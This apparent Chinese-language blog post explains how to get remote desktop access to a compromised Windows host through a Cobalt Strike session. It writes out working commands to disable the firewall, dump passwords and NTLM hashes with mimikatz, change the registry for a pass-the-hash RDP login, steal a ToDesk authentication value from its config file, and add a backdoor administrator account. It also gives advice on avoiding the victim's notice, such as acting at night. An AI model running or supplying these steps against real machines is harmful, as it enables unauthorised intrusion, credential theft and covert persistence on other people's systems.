关于CS上线后的远程思路_win
首先上线之后需要检查3389端口是否开放
通过netstat -an来进行查看
如若没开启可通过CS上的一键化工具进行开启远程桌面,注意需要管理员权限(并且需要关闭防火墙)
shell netsh advfirewall set allprofiles state off
通过mimikatz获取明文密码直接登录
这种方式仅适用于win2008及以下的版本,直接运行猕猴桃抓密码
通过CS搭建SOCKS4隧道,在用工具连接该隧道把自己给代理进去(这里搭建隧道的时候,一定要记得把自己cs服务器上的防火墙配置好,要不然要报错。
我这里用的是frp穿透进去的,连接frp的隧道,配置一下代理。
成功连接
通过mimikatz获取到ntlm值来登陆
针对windows 2012以上版本,在windows 2012以后是无法获取到明文密码的,只能获取到ntlm值。
然后再用frp搭建一个socks4代理
然后用mimikatz来进行远程登录
在CS的交互会话上执行以下命令 开启注册表,开启目标主机的Restricted Admin Mode命令如下:
shell REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
再打开mimikatz输入以下命令
privilege::debug
sekurlsa::pth /user:administrator /domain:. /ntlm:e19ccf75ee54e06b06a5907af13cef42 "/run:mstsc.exe /restrictedadmin"
选中需要远程的服务器地址,即可远程成功
(114条消息) 内网渗透:四、windowsRDP-hash传递登录_L_DC的博客-CSDN博客_hash登录远程桌面
我这里暂时没有登陆成功,因为我用的win10,等我2012下载好了再说。
我这里用2008复现成功
就算不能登录也可以建立ipc连接
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:目标机器IP /ntlm:xxxxxx"
开启guest用户
- CS插件一键化开启guest ,并加入管理组
这个目前还没复现成功在win10上,换成2008来试一下
反正能开就开,不能就拉倒,开启之后直接空密码登录即可(感觉不入自己创建用户)。
todesk&向日葵
首先下载免安装版,通过cs放到对面的电脑上,然后执行
注意用这个的时候,对面的桌面也会弹出界面
通过查看进程看是否开启
其次去查找todesk免安装的配置文件,默认为以下路径config文件
C:\ProgramData\ToDesk_Lite
将其下载下来,看着两个参数
把tempAuthPassEx的值复制出来,替换掉本机todesk配置文件中原来的tempAuthPassEx值
重启todesk获取服务器的验证码,输入服务器识别码及验证码连接成功
缺点就是,连接的时候,还会弹出连接方的信息,师傅们记得用小号上这个软件。
创建新用户到管理组
shell net user adm psw /add
shell net localgroup administrators adm /add
绕过火绒的话,参考我之前发的博文。
成功登录
不过win10会弹出这个,导致受害者知道,最好晚上的时候使用,或者说,最好不要使用远程桌面捏,动静太大了。
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。